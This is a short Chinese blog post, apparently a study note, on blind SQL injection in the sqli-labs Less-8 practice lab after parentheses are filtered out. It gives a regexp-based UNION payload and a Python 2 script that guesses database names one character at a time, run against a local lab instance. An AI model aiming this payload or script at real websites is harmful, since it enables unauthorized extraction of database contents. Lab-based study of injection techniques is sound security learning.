Python学习之绕过小括号过滤后的盲注

Posted 2020-10-29 peterpan0707007

0x00   环境搭建

sqli-labs第八关，简单修改下源代码，加入下面一行代码

$id=preg_replace(‘/\\(|\\)/‘, "",$id);　　//过滤小括号

0x01   脚本编写

1、构造payload

‘ union select 1,2,3 from information_schema.tables where table_schema regexp binary ‘^%s.*$‘ -- -

2、脚本如下

#coding=utf-8

import urllib

url = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s"
#测试payload
payload = "‘ and 1=2 union select 1,2,3 from information_schema.tables where table_schema regexp binary ‘^%s.*$‘-- -"
#简单测试字典，这里可以借助string.printable
list=‘abcdefghijklmnopqrstuvwxyz‘
#递归暴库
def check(str):
    for ch in list:
        payloads=payload % (str+ch)
        if check1(payloads):
            print str+ch
            check(str+ch)
#判断正则匹配结果是否正确
def check1(str1):
    resp=urllib.urlopen(url % str1).read()
    if "You are in" in resp:
        return True
    else:
        return False
        
if __name__ == "__main__":
    check("")
        

脚本执行部分结果